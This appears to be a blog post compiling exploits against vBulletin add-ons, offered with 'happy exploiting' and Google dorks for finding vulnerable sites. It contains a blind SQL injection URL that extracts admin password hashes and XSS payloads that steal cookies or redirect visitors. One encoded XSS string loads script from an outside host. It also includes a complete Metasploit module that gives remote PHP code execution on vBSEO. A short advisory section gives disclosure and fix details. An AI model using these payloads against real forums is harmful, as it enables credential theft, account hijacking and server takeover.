c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection
--==+======================================================================================================================+==----==+ vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability +==----==+======================================================================================================================+==--AUTHOR: Cold z3ro & Crck_ManSITE: www.vbPlaza.comDORK: inurl:"vbplaza.php?do=*"DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hashEXPLOIT:http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*IE: ascii encodes58 => :48 => 0120 => xNOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .Copyrights : www.hackteach.org , www.h-t.ccGreetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends
vBTube
vBShouttitle : vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable
Author : Crackers_Child [ cybermilitan@hotmail.com ]
Exploit : vBTube.php?do=search&search=<script>alert(document.cookie)</script>
Dork : inurl:vBTube.php ( inurl:vBTube.php için yaklaşık 120.000 sonuçtan)
Greetz : www.biyofrm.com & www.sibersavascilar.com
# Exploit Title: vBShout persistent XSS 0day# Google Dork: "DragonByte Technologies Ltd" vbshout# Date: 21/3/2012 9:00 PM #EST# Author: ToiL# Software Link: http://www.dragonbyte-tech.com/# Version: all# Tested on: all# CVE : XSS#Greeting from Team Odyessy.#Today we will release a 0day for the vBulletin mod, vBShout.#This 0day exploit is brought to you by www.Bugabuse.net/#Have fun, And happy exploiting.######Guide########Enter<script>top.location='https://www.bugabuse.net/';</script>into the shoutboxgo into the archive.Vioala. Persistent XSS exploit.Modify to your liking.
vBshop persistent XSS
# Exploit Title: vBshop persistent XSS 0day# Google Dork: "DragonByte Technologies Ltd" vbshout# Date: 25/3/2012 9:32 PM #EST# Author: ToiL# Software Link: http://www.dragonbyte-tech.com/# Version: all# Tested on: all# CVE : XSS
#Greeting from Team Odyessy.#Today we will release a 0day for the vBulletin mod, vBShout.#This 0day exploit is brought to you bywww.Bugabuse.net/<http://www.bugabuse.net/>#Have fun, And happy exploiting.
######Guide########
Go to vBshopGift an item to aother user.In the 'message to user' put:<script>top.location='https://www.bugabuse.net/';</script>Send the item off.Go to the users profile that you giftedBoom. Pers. XSS.Edit to your likeing.
vBSEO - Persistent XSS ( 3.5.2 & 3.2.2)http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
Versions Affected: 3.5.2 & 3.2.2 (Most likely all versions)
Info:A proven success record, vBSEO powers the most optimized forums on the Web.The #1 SEO plugin and the only professional, fully supported solution. A fullpackage of SEO enhancements, one install, one upgrade.
External Links:http://www.vbseo.com
Credits: MaXe (@InterN0T)
-:: The Advisory ::-vBSEO is prone to persistent XSS due to insufficient sanitization of the titles on external websites vBSEO reads.ModCP & AdminCP has the following features affected: "Moderate LinkBacks", "Incoming LinkBacks", "Outgoing LinkBacks"
Sample PoC:<html><head><title> [XSS String] </title></head><body><a href="hxxp://vbulletin-installation-with-vbseo.tld/01-some-forum-thread.html">SEKSCY INJECT TIEM!</a>
</body></html>
After clicking the link, which the attacker has to do, vBSEO will initiate a GET-requested to the target and willthen save the linkback if enabled, in either the incoming linkback list or the moderation queue. By default alllinkbacks are enabled and this linkback is known as the "RefBack". (vBSEO checks the Referrer.)
Sample XSS String:test"><script>document.write(atob(/PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbnRlcm4wdC5uZXQvdXR1YmUvaW5kZXgucGhwP3hzcz1oYXgwcjF0bjB3ZjByMzQxIj48L3NjcmlwdD4=/.source));</script>
-:: Solution ::-The vendor is still working on a patch even though it is very simple to patch.
File: /modcp/vbseo_moderate.phpLines: 276 or 274 (depends on version), 230, 178, 112 are vulnerable.Details: Look for "$pback[t_title]" which is the major cause of this vulnerability.
Disclosure Information:- Vulnerability found and researched: 16th December 2010- Disclosed to vendor (vBSEO): 16th December- Semi-Disclosed at InterN0T: 30th December- Detailed Disclosure: 31st January 2011
References:
http://forum.intern0t.net/intern0t-advisories/3559-vbseo-3-5-2-3-2-2-persistent-cross-site-scripting-via-linkbacks.html
EgiX/vBSEO 3.6.0 proc_deutf() Remote PHP Code Injection
http://www.exploitsdownload.com/exploit/na/vbseo-360-proc_deutf-remote-php-code-injection
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the 'proc_deutf()' function
defined in /includes/functions_vbseocp_abstract.php. User input passed through
'char_repl' POST parameter isn't properly sanitized before being used in a call
to preg_replace() function which uses the 'e' modifier. This can be exploited to
inject and execute arbitrary code leveraging the PHP's complex curly syntax.
},
'Author' => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
'License' => MSF_LICENSE,
'Version' => '$Revision,
'References' =>
[
['BID', '51647'],
['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 8190,
'Keys' => ['php'],
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jan 23 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
response = send_request_cgi({
'method' => "POST",
'uri' => uri,
'data' => "#{data}"
})
if response.code == 200 and response.body =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
if datastore['CMD']
p = "passthru(\"%s\");" % datastore['CMD']
p = Rex::Text.encode_base64(p)
else
p = Rex::Text.encode_base64(payload.encoded)
end
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
response = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'data' => data,
'headers' => { 'Code' => p }
})
print_status("%s" % response.body) if datastore['CMD']
end
end
No comments:
Post a Comment